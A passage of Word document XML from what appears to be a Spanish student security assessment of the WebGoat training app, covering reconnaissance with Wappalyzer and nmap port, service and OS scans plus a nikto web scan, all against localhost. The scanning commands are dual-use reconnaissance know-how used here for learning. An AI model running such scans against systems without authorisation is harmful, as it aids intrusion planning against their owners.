        </w:rPr>
        <w:t>Docker run -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79099855" w14:textId="77777777" w:rsidR="00C1653A" w:rsidRPr="00C1653A" w:rsidRDefault="00C1653A" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C0AA91" w14:textId="0025FAA1" w:rsidR="0031641F" w:rsidRDefault="00D942CA" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16B4F451" wp14:editId="0A2CC898">
            <wp:extent cx="5612130" cy="2037715"/>
            <wp:effectExtent l="0" t="0" r="762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037715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CAECE" w14:textId="1D9AF725" w:rsidR="00C1653A" w:rsidRDefault="00C1653A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D08144A" w14:textId="554EA4CD" w:rsidR="00C1653A" w:rsidRPr="00C1653A" w:rsidRDefault="00C1653A" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se busca información en la web con la extensión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A27CEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, nos indica Lenguaje de programación, librerías JavaScript, bibliotecas JavaScript, Servidores Web entre otros. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F041947" w14:textId="77777777" w:rsidR="00C1653A" w:rsidRDefault="00C1653A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD6376F" w14:textId="01347802" w:rsidR="00A27CEA" w:rsidRDefault="00C1653A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F4C46A" wp14:editId="1B6C6451">
            <wp:extent cx="5612130" cy="253873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538730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB836A" w14:textId="55A4B9C7" w:rsidR="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EC8A1D" w14:textId="682BA7A6" w:rsidR="00A27CEA" w:rsidRDefault="00A27CEA" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hallazgos activos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F6668" w14:textId="7AFEDC5C" w:rsidR="00A27CEA" w:rsidRDefault="00A27CEA" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510BFA41" w14:textId="3771495D" w:rsidR="007C1124" w:rsidRDefault="00FE57B7" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En esta sección se presentan los resultados obtenidos mediante la recolección de información activa sobre WebGoat. Esta fase implico la interacción directa con el sistema a través de herramientas </w:t>
      </w:r>
      <w:r w:rsidR="004D766B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>específicas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para identificar servicios, puertos abiertos y configuraciones expuestas; La información recopilada complementa los hallazgos pasivos y nos permite tener una visión más detallada del entorno</w:t>
      </w:r>
      <w:r w:rsidR="00CF6770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo que nos sirve para identificar posibles vulnerabilidades explotables. A continuación, se detalla </w:t>
      </w:r>
      <w:r w:rsidR="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los pasos de las técnicas utilizadas junto con la evidencia de los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BDC7D" w14:textId="77777777" w:rsidR="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB3B7BC" w14:textId="332F6E11" w:rsidR="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realiza el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nos permite identificar los puertos abiertos y servicios en ejecución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E3F78" w14:textId="77777777" w:rsidR="007C1124" w:rsidRPr="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0B8FAC" w14:textId="7AF5A865" w:rsidR="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C78B64A" wp14:editId="5D2178FF">
            <wp:extent cx="5612130" cy="190944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909445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A27AC" w14:textId="2B3F49CA" w:rsidR="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FE9A09" w14:textId="286FFC56" w:rsidR="007C1124" w:rsidRDefault="007C1124" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realiza el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1124">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00934DF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>detalla la detección de servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED8145F" w14:textId="3D836EF4" w:rsidR="00934DF9" w:rsidRDefault="00934DF9" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76446772" w14:textId="6B3024D0" w:rsidR="00934DF9" w:rsidRDefault="00934DF9" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524FD9A7" wp14:editId="60D3B822">
            <wp:extent cx="5612130" cy="34099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409950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31013AE5" w14:textId="09AACC2E" w:rsidR="00934DF9" w:rsidRDefault="00E576EA" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Se realiza el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E576EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E576EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nos permite identificar el sistema operativo, servicios activos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832C784" w14:textId="70BE329E" w:rsidR="00E576EA" w:rsidRDefault="00E576EA" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA8CB16" w14:textId="6883A645" w:rsidR="00E576EA" w:rsidRDefault="00E576EA" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="307BD6FA" wp14:editId="3C86B58F">
            <wp:extent cx="5612130" cy="3630930"/>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630930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E8906" w14:textId="447E9C2E" w:rsidR="00E576EA" w:rsidRDefault="00E576EA" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483A7590" wp14:editId="144556B9">
            <wp:extent cx="5612130" cy="82613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826135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D0D48" w14:textId="382303C7" w:rsidR="00BB1C31" w:rsidRDefault="00BB1C31" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3254B738" w14:textId="09A2B3EC" w:rsidR="00EB7874" w:rsidRDefault="00EB7874" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otros hallazgos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD277F" w14:textId="627B3C20" w:rsidR="00275887" w:rsidRDefault="00275887" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CBE7B48" w14:textId="339864C6" w:rsidR="00275887" w:rsidRDefault="00275887" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se realiza el comando (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275887">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275887">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h http://localhost:8080)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A579D3E" w14:textId="2C3A10A2" w:rsidR="00275887" w:rsidRDefault="00275887" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
